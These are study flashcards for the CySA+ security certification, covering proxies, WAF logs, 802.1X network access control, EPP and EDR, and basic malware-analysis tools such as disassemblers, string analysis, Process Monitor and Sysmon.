CySa+ Study Notes 6 Flashcards
??? acts on behalf of internal hosts by forwarding their HTTP requests to the intended destination. This is often implemented in environments where traffic outbound for the Internet needs to comply with some administrative or security policy. Proxies can be classed as non-transparent or transparent.
A nontransparent proxy means that the client must be configured with the server address to use it; a transparent proxy (or “forced” or “intercepting”) intercepts client traffic without the client having to be reconfigured.
Forward Proxy
provides for protocol-specific inbound traffic. You can deploy a ??? and configure it to listen for client requests from a public network (the Internet). The proxy then creates the appropriate request to the internal server on the corporate network and passes the response from the server back to the external client.
*** Snort / Zeek (Bro) are open source IDS, Security Onion is open source for security monitoring, incident response and threat hunting.
Reverse Proxy
WAF : Traffic that matches a suspicious or unwanted signature will typically be logged with the source and destination addresses, why the traffic triggered an alert (what known suspicious behavior it matched), and what action was taken (based on the configured rule).
WAF log entry will include : time of event, severity of event, URL parameters like local resource path and query strings, HTTP method(s) used in event plus request and response headers, context for the rule, such as reference to database of known vuln.’s and exploit techniques.
info
The IEEE 802.1X standard defines a port-based NAC (PNAC) mechanism. PNAC means that the network access device (switch, router, or VPN concentrator, for instance) requests authentication of the connecting host before activating the port. The host requesting access is the supplicant. The network access device, referred to as the authenticator, enables the Extensible Authentication Protocol over LAN (EAPoL) protocol only and waits for the device to supply authentication data. The authenticator passes the supplicant credentials to an authenticating server. The authenticating server checks the credentials and grants or denies access. If access is granted, the network access device will configure the port or VPN tunnel to use the appropriate VLAN and subnet on the local network and enable the port for ordinary network traffic.
info
??? is a single agent performing multiple security tasks, including malware/intrusion detection and prevention, but also other security features, such as a host firewall, web content filtering/secure search and browsing, data loss prevention (DLP) enforcement, and file/message encryption.
endpoint protection platform (EPP)
is focused on logging of endpoint observables and indicators combined with behavioral- and anomaly-based analysis. The aim is not to prevent initial execution, but to provide real-time and historical visibility into the compromise, contain the malware within a single host, and facilitate remediation of the host to its original state.
endpoint detection and response (EDR)
Disassemblers and decompilers are software that translate low-level machine language code into higher level code.
Assembly code—A disassembler converts machine code to assembly code.
Assembly code is the native processor instructions used to implement the program.
Machine code—The binary code executed by the processor.
info
is any sequence of encoded characters that appears within the executable file. String analysis can reveal everything from variables the program is using to API calls, and more. These strings may help you identify the nature or function of the malware.
A String
Process Monitor is more suited toward recording and analyzing how the process interacts with the system. With Process Monitor you can analyze every operation that a process is undertaking (including Registry key usage), the status of that operation, and any additional input/output detail of that operation. You can also analyze each operation’s thread stack to find its root cause.
info
??? is a logging version of Process Monitor. It can log the same types of activity as Process Monitor, using a filter to focus on security-relevant event types. This can provide a basic intrusion detection system.
System Monitor (sysmon)
